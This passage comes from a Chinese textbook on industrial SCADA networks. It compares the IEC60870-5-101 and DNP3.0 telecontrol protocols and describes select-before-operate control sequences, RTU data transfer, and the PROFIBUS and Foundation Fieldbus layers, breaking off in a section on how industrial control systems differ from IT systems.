IEC60870-5-101 协议的双层地址结构为报文路由寻址提供极大的灵活性; ③ IEC60870-5-101 协议具有很大的端节点地址范围,最多可有3个字节的 地址,可以表示16777216个地址; ④ DNP3.0 协议仅支持数据链路层地址,没有应用层地址; ⑤ DNP3.0 协议的数据链路层地址包含源地址和目的地址字段。 总之,IEC60870-5-101 协议通过数据链路层地址,应用层地址以及地址长 度可变等,给寻址过程带来更多的灵活性。地址长度可变机制带来的好处是当通 信过程只需要数量不多的地址字段时,可以节省通信带宽。 (2)数据链路层通信。 ① IEC60870-5-101 协议支持平衡模式和非平衡模式的工作方式; ② IEC60870-5-101 协议不支持点对多点通信环境中的主动报文传送机制; ③ DNP3.0 协议只支持平衡模式的通信方式。 DNP3.0 和 IEC60870-5-101 协议都支持平衡模式通信及点对点通信。但 是,IEC60870-5-101 协议的平衡模式通信方式仅限于点对点通信的情形,这种 机制具有明显的局限性,例如一个站点在设计时需要考虑多站点通信情形时, IEC60870-5-101 协议就不支持平衡模式通信。典型的例子是当存在许多台分 站点都需要利用窄带通信信道(如 VHF 无线连接)与主站进行通信时,轮询数据 需要占用很多带宽,在这种情形下,支持多站点平衡通信方式的 DNP协议处理多 站点突发性异常告警将具有很多优势。 (3)数据帧格式。 ① IEC60870-5-101 协议使用FT1.2 帧格式,具有8位校验以及最长255字 节的长度; ② IEC60870-5-101 协议数据帧具有固定帧长和可变帧长格式; ③ DNP3.0 协议使用 FT3 数据帧格式,具有16比特CRC 校验位以及最长255 字节的长度; ④ DNP3.0 协议只能使用可变帧长格式。 当 IEC60870-5-101 协议使用固定帧长数据帧时,其报文形式相比 DNP3.0 报文将非常短而简单,同时也将充分降低通信开销。 (4)应用功能和数据对象。 ① 差异性。 (i)IEC60870-5-101 协议仅允许在每个报文中控制一个站点; (ii)IEC60870-5-101 协议使用单字符的应用确认; (iii)DNP3.0 允许在一个报文中控制多个通信站点; (iv)IEC60870-5-101 (v)IEC60870-5-101 (vi)IEC60870-5-101 协议在一个报文中仅允许一种数据类型; 协议的数据类型字段同时定义数据功能和数据类型; 协议的数据对象主要适应于子站通信环境; (vii)DNP3.0 协议允许在同一个报文中存在多个数据对象; (viii)DNP3.0 协议使用相对独立的功能码; (ix)DNP3.0 协议的每个报文有一个功能码,该功能码可以适用于报文的所 有数据对象。 IEC60870-5-101 和 DNP3.0 协议所支持的应用层功能和数据对象方面具 有明显差异。DNP3.0 中功能码和数据对象字段的分离机制可能提供更多的灵活 性,但也由此带来了更多的复杂性。 ② 安全性。 (i)IEC60870-5-101 协议在事件清除操作之前需要数据连接确认; (ii)DNP3.0 协议在事件清除操作之前需要用户应用程序确认; (iii)DNP3.0 协议拥有更强的差错校验机制; (iv) 两种协议在操作执行前都需要选择过程。 DNP3.0 协议的纠错能力比IEC60870-5-101 协议强,但这种优势主要依赖 于通信信道的比特位错误率和报文长度。由于IEC60870-5-101 比 DNP3.0 协 议报文短,两种协议在纠错能力上的总体差异并不很明显。 ③ 互操作性。 (i)IEC60870-5-101 协议没有官方认证或授权过程; (ii) 有公司提供对IEC60870-5-101 协议的标准测试; (iii)DNP3.0 协议为 IED 装置的通信专门定义了协议子集; (iv)DNP3.0 协议定义了一致性测试过程; (v)DNP3.0 协议在北美定义了认证或授权方法。 测试过程和授权机制,以及协议的标准化实现过程是 DNP3.0 协议的显著特 点。但是,虽然 DNP3.0 协议在工业领域已经确立领先地位,未来 IEC60870-5- 101 协议与 DNP3.0 协议的应用差异将逐步缩小。 ④ 复杂性。从一些方面看,IEC60870-5-101 协议是一种简单协议并可以一 种简单的方式使用,这类例子如下: (i) 协议报文中没有独立的应用功能码; (ii) 数据对象简单,不像 DNP3.0 协议一样形式变化多样; (iii) 站点寻址机制比 DNP3.0 协议简单; (iv) 可以配置成固定帧长报文; (v) 可配置成使用数据链路层的非平衡传输模式; (vi) 报文冲突避免机制简化了通信过程; (vii) 在数据链路层使用单字节的 ACK 传输机制; (viii)FT1.2 的数据帧格式较为简单(缺少纠错机制); (ix) 缺少传输层,并且每个数据包中只能有一种类型的数据,简化了接收端 对报文的分解过程。 另一方面,IEC60870-5-101 协议存在一些底层问题有时候需要重新配置, 这些问题在系统集成的时候可能会增加复杂性。DNP3.0 协议虽然在许多方面很 复杂,但在一个系统中并不是所有的特性都需要同时具备。DNP3.0 协议的最小 实现子集定义了 DNP3.0 协议有限的功能和地址模式数量。 ⑤ 高效性。IEC60870-5-101 协议的一些特性如固定帧长报文,单字节应用 确认,以及相对较弱的纠错机制导致所产生的报文较短。但是,IEC60870-5-101 协议却需要数量巨大的数据报文发送信息,因此上述短报文的优势不太明显了。 如果事先不清楚或缺乏对一个 SCADA 系统具体承载的数据信息内容的分析,则 很难判断究竟哪一种协议工作运作得更有效些。 SCADA 系统协议的具体内容是通过数据报文的形式在网络中传输的,所以报 文长度将直接影响效率,因为报文中还将封装其他数据,于是那些 IEC60870-5- 101协议的短报文的实际利用效率不高。 ⑥ 工业界对协议的支持情况。IEC60870-5-101 协议相对于 DNP3.0 而言, 在欧洲使用较为广泛,但主要集中应用于电力行业。DNP3.0 协议在欧洲的其他 工业领域也逐步得到广泛应用,这种趋势的例子是IEEE Std1379“变电站智能电子 装置和远程终端单元间数据通信推荐规范”,该推荐规范同时支持 IEC60870-5- 101协议和 DNP3.0 协议。IEC60870-5-101 协议和 DNP3.0 协议在亚洲的推广 应用程度相似,DNP3.0 协议在澳大利亚工业界占主导地位,IEC60870-5-101 协 议也像 DNP3.0 协议一样得到主流设备制造商的广泛支持。 总之,IEC60870-5-101 协议和 DNP3.0 协议都得到广泛应用,但在不同的 工业领域和地理区域有所不同。 IEC60870-5-101 和 DNP3.0 都是为远动应用专门设计的开放协议,它们 都为了满足相同的需求,具有相同的设计基础并几乎在同一时代产生。两种协 议都主要为满足电力工业的需求而开发,当然 DNP3.0 协议具有更多的数据类 型,这些数据类型并不仅局限于电力工业,可以适用于更多工业领域的 SCADA 系统应用。 IEC60870-5-101 和 DNP3.0 协议特点的对比过程表明两种协议存在差异, 而这种差异性在对有的场景来说是优点,对有的场景来说是缺点。在很多情况下, IEC60870-5-101 协议似乎是一种更简单的协议,但这并不意味着协议的具体实 现更简单。DNP3.0 协议为具体操作实现过程定义完整的测试过程和认证鉴别机 制,以确保不同设备制造商开发的产品具有互操作性。 1.5.3 SCADA 系统中的网络信息转换过程 1)主站到远方终端的数据传送 从主站到远方终端传输的信息主要完成设备控制,设定点控制以及批数据传 送。由于操作错误设备或接收错误的控制报文将引发严重后果,因而需要额外的 安全措施确保控制过程的准确性。这种机制由一个控制报文序列组成,如图1.21 所示,通常称为操作前选择(select -before -operate)序列。 主设备到远程 控制选择信息 函数代码 控制地址 设置点 远程到主设备 核对信息 函数代码 控制地址 设置点 主设备到远程 执行信息 函数代码 控制地址 远程到主设备 执行确认消息 函数代码 控制地址 图1.21 控制报文顺序 (1)报文构建和报文结束字段在图1.21 中未显示; (2)功能码标识在RTU中需要执行的具体操作内容; (3)控制地址表示需要控制的设备或设定点装置; (4)设置点提供了能被 RTU 识别的数值; (5)远方终端发送到主站的校验报文是由RTU 设备中的节点选择专用硬件 产生,目的是核实 RTU 是否正确解释控制命令,并执行了正确的动作。 主站传送至远方终端的执行报文,只有当主站端接收到正确的校验报文后才 会被传送。 远方终端传送至主站端的执行确认报文是控制动作被正确执行的标志。 由于在控制、选择、核对和操作错误的控制设备的报文执行环节将出现未能及 时检测出的差错,上述报文交互流程提供了除校验和执行确认报文之外的另一种 安全保护机制。在上述控制报文序列传输之前,控制人员或调度人员可以通过控 制面板执行相似的选择—选择确认—执行—执行确认流程。 对于某些特定类型的操作,例如控制提升或者降低发电机转速,操作错误设备 的严重后果仅仅在一个脉冲后就会发生。由于自动发电控制系统可以很快纠正这 种错误,将不会产生严重问题,故只有图1.21控制报文顺序所示的控制报文顺序 中的第一个报文被发送。 从主站传送到远方终端的批数据的内容包含异常状态报告参数和本地控制设 备参数。这种类型的数据传送过程和顺序如图1.22所示。 主设备到远程 控制信息 函数代码 控制地址 远程到主设备 核对信息 函数代码 控制地址 主设备到远程 批量数据传输消息 函数代码 控制地址 数据 远程到主设备 确认消息 函数代码 控制地址 图1.22 批数据传送顺序 (1)报文构建和报文结束字段在图1.22批数据传送顺序中未显示; (2)上述过程如果使用两终端直通型通信信道进行通信,则需要考虑使用特 殊的预防措施,确保其他 RTU 不会接收并解码批数据传送数据包。 图1.22所示流程中最初两个报文的目的是通知 RTU 准备好接收比常规报文 长度更长的报文,第三个报文是传输数据,第四个报文是标识数据已经被接收方的 RTU 正确接收。 2)远方终端到主站的数据传送 所有从远方终端到主站的数据传送是由一个基本的报文会话流程实现,该流 程在报文字段中使用不同的域定义不同类型的数据。其数据流程如图1.23所示。 主设备到远程 数据请求信息 函数代码 数据识别 远程到主设备 数据信息 数据单元1 数据单元2 数据单元N 图1.23 数据采集的会话报文顺序 (1)报文构建和报文结束字段在图1.23中未标识; (2)功能码说明在 RTU 中传送的数据类型; (3)数据识别字段标识主站接收的数据量大小和数据类型。 在RTU 传送每个报文时(那些只含有实时数据的报文除外),在RTU 缓存中 保持已传送出去的报文是非常必要的,当主站端没有正确接收到报文时,可以将这 些数据报文进行重传,否则数据将丢失。 图1.23 的数据传送流程可以传送三类报文数据,数据单元可以表示模拟数值 (通常每个数据由12位表示)、开关的二进制状态值(1个比特位表示1个开关的 状态),也可以是与开关的上一状态有关联的二进制开关状态值(2个比特位表示 1个开关的状态),每个报文都包含很多上述类型的数据,并按照预先定义的顺序 传送。报文通常有各种长度类型的数据单元,所以主站端需要明确即将接收到的 数据单元的具体数目。如果在一个报文中传送不了所有的数据,主站端会请求额 外的数据包来传送,直至所有数据都收到。 报文包含的数据如下: (1)16位模拟数值(每组数据单元含1个); (2)128个状态比特(每组数据单元含16个); (3)64个状态/内存单元状态(每组数据单元含8个); (4)模拟数值和状态比特的混合型数据。 已传送的那些包含过去状态变化量的数值必须在传送缓冲中受到保护,以防 止出现数据丢失的情形。 “数据快照”是前一时刻存储在 RTU 中的数据(通常由主站或 RTU 中的本地 时钟控制)。数据单元可以是模拟量,也可以是内存位置。 主站系统经常同时从许多RTU 设备获取“数据快照”,于是主站系统给这些 RTU 设备同时发送一个“广播冻结”指令。“广播冻结”指令报文的“报文建立字 段域”有一种特殊的编码取代 RTU设备地址;所有具有“数据快照”的RTU设备将 收到这类指令报文。“功能码字段”表示“数据快照”的类型。 突发数据报文是外部设备的状态信息与上一次报文相比有明显变化的过程信 息。这类报文的例子是有关开关装置的报文,开关具有变化的状态,模拟数值,继 上一个报文之后,开关预设的增量或减量通常会变化。由于主站无法获知下一阶 段将收到什么类型的数据,每个数据单元应该包括新设备状态或模拟量值、RTU 的站点地址等。此外,由于主站不知道总的报文长度,这些数据报文必须是混合长 度的(未使用的比特必须用不代表任何意义的码字填充),多级报文用来标识所有 变化。 1.5.4 SCADA 网络系统中的现场总线[4] 自20世纪80年代末以来,基金会现场总线(Foundation Fieldbus,FF)、Lon- Works、PROFIBUS、CAN(Controller Area Network)和 HART(Highway Addressable Re- mote Transducer)现场总线技术已经逐渐形成其影响并在一些特定的工业应用领域 显示了自己的优势。而工业 SCADA 系统中应用的现场总线技术主要有两种: (1)过程现场总线(Profibus 总线); (2)基金会现场总线(Foundation Fieldbus)。 1.5.4.1 PROFIBUS 总线 1)基本介绍 PROFIBUS 是 Process Fieldbus的缩写,是由德国 DIN19245 标准的第1和第2 部分定义的一种开放式现场总线标准,该标准是基于令牌总线及流体型结构的系 统。如图1.24PROFIBUS协议结构1.24所示,PROFIBUS分为三种类型:FMS、DP 和PA 。FMS(Fieldbus Message Specification,现场总线信息规范)主要用于数据采 集系统,DP 主要用于高速通信,PA 主要针对那些特别强调设备安全和通信安全的 应用。 FMS DP PA DP 配 置 PA配置 FMS 设备配置 DP 基本功能 现场总线报文规范 现场总线数据链路 RS-485/光纤 IEC 1158-2 EN 50170 图1 . 24 PROFIBUS 过程现场总线配置 协议结构 2)物理层 物理层定义了PROFIBUS传输介质的类型,EIA-485 电压等级标准通过Pro- fibus 的 FMS 协议和 DP协议进行定义。 PROFIBUS 的 PA 协议主要由IEC1158-2 定义: (1)FMS(RS-485):187.5kbit/s,General use。 (2)DP(RS-485):500kbit/s/1.5Mbit/s/12Mbit/s,Fast devices。 (3)PA(IEC 1158-2):31.25kbit/s,Intrinsically safe。 PROFIBUS 标准规定的 RS-485 电压标准特性: 拓扑:线性总线,在每个网络终端处结束。 传输媒质:屏蔽双绞线电缆。 线缆尺寸:18AWG(0.8mm)。 衰减:3dB/km(39kHz)。 站点数:每段32个站,不带转发器。带转发器最多可到127个站。 总线长度:最大1200m, 在低速率时可扩展至4800m。 速度:将近12Mbit/s。 插头连接器:最好为9针D 副插头连接器。 IEC1158-2 传输协议能满足化工和石化工业的要求,可保持其本质安全性并 使现场设备通过总线供电。IEC1158-2 协议在9~32V 直流电压范围,使用曼彻 斯特编码调制双极性 NRZ+/-10mA 信号,该10mA 电 流 产 生 一 个 + / - 1V 的 电 压信号,总线上的所有设备都可以检测该电压信号的变化。 在同一个系统中可以很容易地将使用Profibus 协议的 FMS、DP 和 PA 的设备 连接起来,使用这三种协议的设备的主要区别在于物理层,这种机制使得设备制造 商可以较低成本开发大多数需要FMS 协议的设备,以及那些特别强调传输速度的 高速设备。专为过程自动化设计,标准的本质安全的设备(PA) 主要用于对安全性 要求高的场合及由总线供电的站点。 3)数据链路层 Profibus 协议定义的数据链路层是现场总线的数据链路层(FDL), 现场总线数 据链路的媒体访问控制(MAC) 层定义通信网络的站点什么时候将传输数据,MAC 层确保在任意时间段,只有一个站点可以传输数据。 基于 Profibus 协议的通信可以使用多种混合通信媒介,并有两种常用的通信 模式,即令牌环传递方式和主站/从站通信方式。 令牌环传递方式保证主站对总线的访问存取权精确控制在预先设计的时间框 内,令牌是一条特殊的电文,它在所有主站中循环一周的最长时间是事先规定的, 令牌环机制特别适用于复杂自动化系统中那些对总线具有相同访问权限的主站的 通信。令牌在规定的时间内按照地址的升序在各主站中依次传递。 主从站方式允许主站在得到总线存取令牌时可与从站通信,每个主站均可向 从站发送或索取信息,该方式的典型配置如图1.25所示。 在总线系统初建时,主站媒体访问控制的任务是制定总线上的站点分配并建 立逻辑环,在总线运行期间,断电或损坏的主站必须从环中排除,新上电的主站必 须加入逻辑环。此外,Profibus 总线存取控制的特点是监测传输介质及收发器是否 损坏,检查站点地址是否出错(如地址重复)以及令牌错误(如多个令牌或令牌丢 失)。 4)应用层 Profibus 协议的应用层由两部分组成:现场总线 FMS 报文和底层接口(LLI), 应用层使用 DIN 19245 的第2部分定义。 5)Profibus 协议通信模型 如图1.26所示,现场设备中用来通信的那部分应用过程叫做虚拟现场设备(VFD), 虚拟现场设备包含由应用层服务操作的通信对象,通信过程读取(描述、 结构、数据类型)的实际设备的对象称为通信对象。 Profibus 站点设备的所有通信对象都填入该设备的本地对象字典(Local Ob- ject Dictionary)中,可分为静态或动态数据对象。 静态通信对象填入静态对象字典中,它们可以由设备制造商预定义或在总线 系统组态时指定。静态通信对象主要用于现场环境通信。 Profibus 协议能识别五种静态通信对象: (1)简单变量; (2)数组(一系列相同类型的简单变量); (3)记录(一系列不同类型的简单变量); (4)域(数据范围); (5)事件。 动态通信对象填入对象字典的动态部分,它们可以由FMS服务预定义或直接 定义、删除或改变。 Profibus 协议能识别两种动态通信对象: (1)程序调用; (2)变量列表(一系列简单变量,数组或记录)。 有两种方法可以访问变量,即用名称(名称符号)寻址或物理地址(内存的物 理位置)寻址。Profibus 协议使用逻辑寻址作为优选方法,因为这种方法可以提高 访问速度。 (1)FMS 服务。从应用过程角度分析,通信系统是一个服务提供者并提供不 同的应用服务——FMS 服务,FMS 描述通信对象、应用服务和从通信合作方角度 产生的模型。应用服务分为只在面向连接的通信过程中使用的确认服务,以及在 无连接的通信过程(如广播和多播模式)中使用的非确认服务。 Profibus 协议的服务原语描述服务的执行过程,应用服务分为如下几类: ① 管理服务提供逻辑连接的建立和释放; ② 变量访问服务允许访问简单数据、记录、数组和变量列表; ③ 域管理服务允许相邻内存区域的传送; ④ 程序初始化管理服务允许对程序执行的控制; ⑤ 事件管理服务使得告警报文的传送成为可能; ⑥ VFD服务支持设备识别和状态报告; ⑦ OD管理服务允许对象字典可读可写。 (2)底层接口。底层接口(LLI) 管理数据流量控制和连接过程监视,并将现场 总线信息规范(FMS) 的服务映射到第2层(FLC) 的服务,期间考虑了不同类型的 服务。用户使用逻辑通道、通信连接等与其他应用过程通信。对于 FMS 和 FMA7 (现场总线第7层)服务的执行来说,LLI 为这些子层的数据传输提供服务。 第一种连接关系是面向连接的关系,面向连接的通信关系用于所有确认性服 务,要用这种类型的通信关系传输数据,必须首先在连接建立阶段建立起连接,而 在数据传输完毕后再断开连接。 第二种连接关系是无连接的关系,在无连接通信关系中,数据可以循环方式传送,例如在一次连接过程中,只有一个变量是永久可读写的。循环数据传送的典型 例子是 PLC 数据的输入和输出的周期性更新,与此相反的情况是那些非循环传送 的数据,例如上层应用偶尔通过连接过程访问不同的通信对象。 (3)通信关系表(CRL) 。 通信关系表包含对一个设备的所有通信关系的描 述,而与设备的使用时间无关。 (4)网络管理。除应用服务即FMS 服务和FMS模型外,Profibus 协议还包含 网络管理内容FMA7。 FMA7 功能分为三类: ① 环境管理提供管理连接的建立和释放; ② 配置管理使得通信关系表可加载、可读,使变量,静态计数器,第1层和第2 层参数,并且通信站点实体的标识信息以及站点注册信息可访问; ③ 故障管理标识故障、事件和站点重启过程。 (5)Profibus 协议的应用。对于不同的应用领域来说,满足工业过程的实际功 能需求是非常必要的。Profibus 协议的应用将包括通信过程中的功能定义,状态和 错误的标识。 Profibus 协议的应用主要有以下几方面: ① 楼宇自动控制; ② 汽车控制; ③ 传感器和传动装置; ④ 可编程逻辑控制; ⑤ 纺织机械。 Profibus 协议使得不同制造商,可以使用同一种协议在不同设备间实现互操作 能力。 1.5.4.2 基金会现场总线 1)基金会现场总线简介 基金会现场总线(Fieldbus Foundation,FF)概念的提出是为了在新的数据通信 协议中保持现有4~20mA 通信标准的重要特征(例如通信连接的标准接口、总线 供电能力和原有的安全特性)。 为更好地理解标准是如何工作的,参考 OSI模型是非常有益的。基金会现场 总线由三部分组成,与OSI七层模型中第1层、第2层、第7和第8层对应。OSI 模 型的第8层与“用户层”对应。 2)物理层和传输介质 基金会现场总线的物理层标准遵循 IEC1158-2 和 ISA S50.02-1992 标准中 有关物理层的定义,现场总线基金会为低速总线颁布了FF-81631.25kbit/s 物理 层规范,所有这些标准都使用曼切斯特的L 编码技术进行四个工作状态编码。在一些情况下,不同配置设备可以工作在总线供电模式。31.25kbit/s(H1,或低速现 场总线)可支持2~32个设备不使用总线供电,2~12个设备由总线供电或2~6 个设备由总线供电的本质安全工作模式。转发器允许在基金会现场总线中使用, 并可以增加总线支持的设备数量。 低速总线通常使用已有的连接线缆技术,如B 型线缆(屏蔽双绞线),当使用# 22AWG 型线缆时可以具有1200m 的通信距离。更高的通信速度要求更高级的连 接线缆,如 A 型线缆(屏蔽双绞线形式)。使用A 型线缆的基金会现场总线,使用# 18 AWG 型线缆可以达到1900m 的通信距离,其他线缆还有C 型线缆(非屏蔽多对 双绞线)和 D 型线缆(非屏蔽多芯线缆),使用#26AWG 的 C 型线缆仅有400m 通 信距离,使用#16AWG的 D 型线缆却只能在不超过200m 范围内通信。 基金会现场总线的传输介质采用浮动平衡机制并在传输导线的两端分别连接 一个终端器,任何一种传输介质都不直接接地。每个终端器由100Ω电阻和一个 电容串联组成,形成对31.25kHz 频率信号的带通电路。终端器应设于主干电缆的 两端尽头,跨接在两根信号线之间。终端器与电缆屏蔽层之间不应有任何连接,以 保证总线与地之间的电气绝缘性能。传输介质的供电能力必须是受条件限制的, 如果传输介质使用“常规”供电模式,低阻抗将导致传输介质的负担过重,最终将 导致传输过程停止。 具有快速响应时间是基金会总线的一个设计目的,例如,31.25kbit/s 的低速 现场总线的响应时间最低可达32μs(系统具有不同的载荷,其响应时间是不同的, 但响应时间的平均值一般在32μs~2.2ms 之间,平均误差大约为1ms 级)。 在曼彻斯特编码过程中,每个时钟周期被分成两半,用前半周期为低电平、后 半周期为高电平形成的脉冲正跳变来表示0;前半周期为高电平、后半周期为低电 平的脉冲负跳变表示1,如图1.27所示。 如图1.28所示,基金会现场总线的帧前定界码标明了基金会现场总线信息的 起点,其长度为8个时钟周期,也就是一个8位的字节。帧前定界码由特殊的N+ 码、N- 码和正负跳变脉冲按规定的顺序组成。在基金会现场总线的物理信号中, N+ 码、N- 码具有自己的特殊性。它不像数据编码那样在每个时钟周期的中间都 必然会存在一次电平的跳变,N+ 码在整个时钟周期都保持高电平,N- 码在整个 时钟周期都保持低电平,即它们在时钟周期的中间不存在电平的跳变。收信端的 接收器利用帧前定界码信号找到现场总线信息的起点。 如图1.29所示,基金会现场总线的物理层遵循IEC1158-2(1993 年)和ISA- S50.02 中有关物理层的标准,协议栈的其他层包括数据链路层、应用层和用户层。 3)数据链路层 基金会现场总线定义的通信协议栈与 OSI 模型的第2层和第7层正好对应, 即数据链路层和应用层。现场总线通信中的链路活动调度,数据的接收发送,活动 状态的探测、响应,总线上各设备间的链路时间同步,都是通过数据链路层实现的。 One Bit time(1/fr) 编码解码 编码规则 符号 解码 1(ONE) Hi-Lo Transition(mid-bit) 0(ZERO) Li-Lo Transition(mid-bit) N+(NON-DATA PLUS) Hi(No transition) N-(NON-DATA MINUS) Lo (No transition) -T/2 T/2 N+ 图1.27 基金会总线的物理层编码波形 报头与分隔符 图1.28 N+ 码 和N- 码的编码规则使用 图1.30所示为数据链路层帧格式。每个总线上有个媒体访问控制中心,称为链路 活动调度器(Link Active Scheduler,LAS)。链路活动调度器在 ISA SP50 和 IEC SC65C/WG6 中以标准的形式使用。 链路活动调度器拥有总线上所有设备的清单,由它来掌管总线段上各设备对 总线的操作。任何时刻每个总线上都只有一个 LAS处于工作状态,总线段上的设 备只有得到链路活动调度器 LAS 的许可,才能向总线上传输数据,链路活动调度 器是总线的通信活动中心。 基金会现场总线的通信活动被归纳为两类:受调度通信与非调度通信。由链 路活动调度器按预定调度时间表周期性依次发起的通信活动,称为受调度通信。 图1 . 29 基金会现场总线的 OSI 模 型 协 议 栈 前沿 (1Byte) 开始定义符 (1Byte) 开销和用户数据 (1~256Byte) 帧检测序列 (2Byte) 结束定义符 (1Byte) 图1 . 30 数据链路层帧格式 链路活动调度器内有一个预定调度时间表。 一旦到了某个设备要发送的时间,链 路活动调度器就发送一个强制数据(Compel Data,CD)给这个设备。基本设备收 到这个强制数据信息,就可以向总线上发送它的信息。现场总线系统中这种受调 度通信一般用于在设备间周期性地传送控制数据,如在现场变送器与执行器之间 传送测量或控制器输出信号。 周期报文或受调度报文主要用于需要周期循环采集的数据信息(如过程和控制 变量),在总线中的设备间周期性更新。现场总线中传输信息的技术称为“发布一预 订”方法。链路活动调度器依据用户预定义(可编程实现)的调度时间表分配每个 设备访问或使用总线的时间,当现场总线中的某台设备得到链路活动调度器的许 可使用网络时,该设备将发布自身设备产生的有用信息,现场总线中的所有其他设 备将监听到该信息,那些预定该类信息的设备,就该信息读入设备内存中,以备其 使用;那些不需要该信息的设备将忽略该信息。 非周期报文或非调度通信报文主要用于那些并不经常出现的特殊情形,如突 发告警或当总线上的某个设备发送重启诊断过程后的特殊控制指令。链路活动调 度器不断侦测在周期报文中存在的可用空闲时隙,并利用这些空闲时隙发送非周 期报文。 4)应用层 基金会现场总线的应用层分为两个子层:现场总线访问子层(Fieldbus Access Sublayer,FAS) 和现场总线报文规范层(Fieldbus Message Specification,FMS)。 链路活动调度器对预定调度时间表的“预编程”能力为终端用户提供了一个功能强大的配置工具,因为设备的轮询时间可以预先设定,并且关键的I/O 节点设 备可以频繁地重新设置其轮询时间,以满足特殊节点的优先级排序需求,这种机制 体现了现场总线访问子层的可靠性和能力。通过现场总线访问子层对调度时间表 进行编程的机制,允许在链路活动调度器和现场总线设备之间,可以对不同“设备 对象”进行操作(实际的和仿真的)。 这三类“设备对象”主要如下: (1)客户端/服务器:专用客户端(链路活动调度器)和服务器(总线设备); (2)发布者/预订者:如前所述; (3)事件分发器:仅指那些对突发事件,异常或其他预先定义的标准操作的响应。 这三类“设备对象”的差异主要来源于实际的工业应用,任何一种机制都不可 能正好完全满足所有应用的需求,但基金会现场总线的灵活性可以从现场总线访 问子层的设计中体现出来。 现场总线报文规范层是第二种子层,包含一个“对象字典(Object Dictionary, OD)”,“对象字典”是一种类型的数据库,该数据库提供用户通过标签名字或序列 编号访问基金会现场总线数据的能力。对象字典包含所有数据类型、数据类型结 构描述和用户应用过程所用到的通信对象。服务允许访问和控制对象字典(应用 数据库),对象字典信息的可读可写机制使得对应用过程的管理和提供服务成为 可能。 5)用户层 基金会现场总线专门定义了用户层,该层是比 OSI七层模型中的第七层更高 的层次,该层通常成为基金会现场总线的第八层,该层的功能主要有三个方面—— 网络管理、系统管理和功能块应用进程。 网络管理功能可以访问网络中的其他层次,以提供其他层次之间或远程对象 (总线中的对象)之间的性能监视和通信管理能力,如图1.31 所示。系统管理任务主要对现场设备地址进行分配、应用时钟同步和功能块调度,这就是设备和软件 间的时钟同步机制,确保现场总线中事件的正确时间戳。 功能块应用进程提供一种可编程“块”的通用结构,终端用户可以使用该“块” 消除那些冗余和耗时的配置过程。“块”概念的引入使得在系统开发和配置阶段 可以对功能、算法甚至主要的设备从对象库中进行选择。该过程可以明显缩短配 置时间,因为大量“功能块“事先已经定义好,终端只需要选择合适的块就可以实 现。功能块应用进程的目标是提供一种支持互操作性的开放系统和设备描述语言 (DDL), 这种互操作性和设备描述语言将使很多用户和设备可以用“功能块”或 “标志”描述。用户将首先寻择一种设备,然后通过选择合适的设备描述语言对象 来逐渐完善这种选择,最终明确定义用户的一款特定产品。用户只需输入一个带 相应参数的控制循环“块”就基本完成了循环功能的初始化配置。高级控制功能 “块”和数学方法“块”将支持更高级的控制应用。 6)故障和诊断 基金会现场总线是专门为过程控制工业设计的数字通信总线,并带有故障检 测和诊断信息。基金会现场总线使用多组态用户组件,并具有从协议栈的物理层 一直到网络层,再到系统管理层的全面故障诊断能力。 物理层的时间和同步信号机制是通信过程中需要持续关注的内容,报文重传 和重传的原因将被详细记录并可以在分析过程中被显示出来。 在更高的层次,网络和系统管理是故障诊断程序的一部分,这种机制使得系统 管理员可以分析网络在线情况并掌握通信负载信息。由于现场总线设备可以添加 并删除,链路活动调度器的优化功能为整个通信过程提供了一种动态优化能力,而 不需完全关闭网络。这种技术确保最佳的时间和及时的设备工作情况报道,为更 高优先级的设备预留更多响应时间,还可以删除、减少那些冗余或低优先级的 报文。 由于每一种设备的描述字典存储在主机控制中心(用户间真实互操作能力的 要求),每种用户产品的所有诊断能力可以被精确报记录或向控制中心告警,以此 提供对每个设备的持续不断的监视。 7)高速以太网 高速以太网(HSE) 是基金会现场总线的中枢网络,其带宽是100Mbit/s, 高速 以太网设备通过高速以太网连接装置、现场总线设备功能单元和计算机连接到骨 干网中。如图1.32所示,高速以太网连接装置是一种连接 H1 现场总线设备模块 和高速以太网的装置,高速以太网连接装置可以用来组建大型的高速以太网络。 高速以太网交换机是一种可以连接多个高速以太网设备,如用来构建大型高速以 太网络的高速以太网连接设备以及高速以太网现场设备的以太网设备。高速以太 网主机一般用来配置监视连接设备和H1 设备。每个H1 设备自带链路活动调度 器(LAS), 该机制使H1 模块在主机与高速以太网的骨干网络断开连接的情况下仍然可以工作。多个H1(31.25kbit/s) 现场总线模块可以用连接装置连接成高速 以太网骨干网络。 1.6 工业 SCADA 系统与 IT 信息系统的主要区别[5] 最初的工业控制系统采用专用的、封闭型网络,并使用特殊设计的控制协议及 其软件和硬件,与传统的IT 系统没有多少相似之处。如今那些应用广泛、低成本 且使用IP 协议的设备越来越多地取代了专用的解决方案,但导致的结果却是漏洞 和脆弱性不断增加。随着工业控制系统逐渐使用IT 解决方案来提高互联互通性 和远程访问能力,并大量使用工业标准计算机、操作系统和网络协议,工业控制系 统开始与IT 系统有更多的相似性。这种整合趋势支持更多的 IT 特性,但却使得 新的工业控制系统与外界的独立性明显不如以往的系统那么明显,而且需要更多 地关注网络安全问题。虽然有很多解决方案可以保障传统 IT 信息系统的信息安 全问题,但将传统 IT 信息系统的安全防护措施引入工业控制系统环境的同时,却 需要考虑很多问题以及特别的措施。在一些工业控制系统的应用场合,需要提出 新的信息安全防护技术来适应工业控制系统的要求。 工业控制系统具有许多不同于传统的基于互联网的信息系统的特性,包括不 同的危害程度和等级要求。工业控制系统所具有的特殊的风险或危害有可能危及 人员生命安全和身体健康,严重污染环境,造成生产能力下降,导致重大经济损失, 给国家的经济带来严重的负面影响。工业控制系统要求不同的性能和可靠性,并 必须使用那些在传统 IT领域可能被看成不方便的操作系统和应用。在工业控制 系统的设计和运转过程中,功能安全和实时性要求经常和网络安全发生矛盾(例 如,在工业控制系统中使用密码鉴别和认证过程,而又不影响紧急情况处理操 作)。下面是当考虑工业控制系统的网络安全时不得不注意的问题: 1)性能要求 工业控制系统要求确定的响应能力。工业控制系统一般都是时间敏感系统; 延迟对于生产过程信息传送来说是不可接受的,而网络的高吞吐率却不那么重要。 相反,IT 信息系统却很强调较高的吞吐率,但一般可以承受一定程度的网络延迟 和抖动。 2)可用性要求 许多工业控制系统要求连续工作,绝对不允许控制生产过程的系统突然中断, 系统中断需要预先在数天/数周前计划和安排好。预先制定详细的应用测试方案 是确保工业控制系统高可靠性的关键环节,除意外停电外,大多数控制系统不可能 在不影响生产过程的条件下任意停止运行或重新启动。在一些情况中,产品的生 产过程或设备的使用过程本身,比生产状态信息受到中断后被重新传送更重要。 传统 IT信息系统的那些常规的应用策略如重启系统或网络,将可能导致严重影响 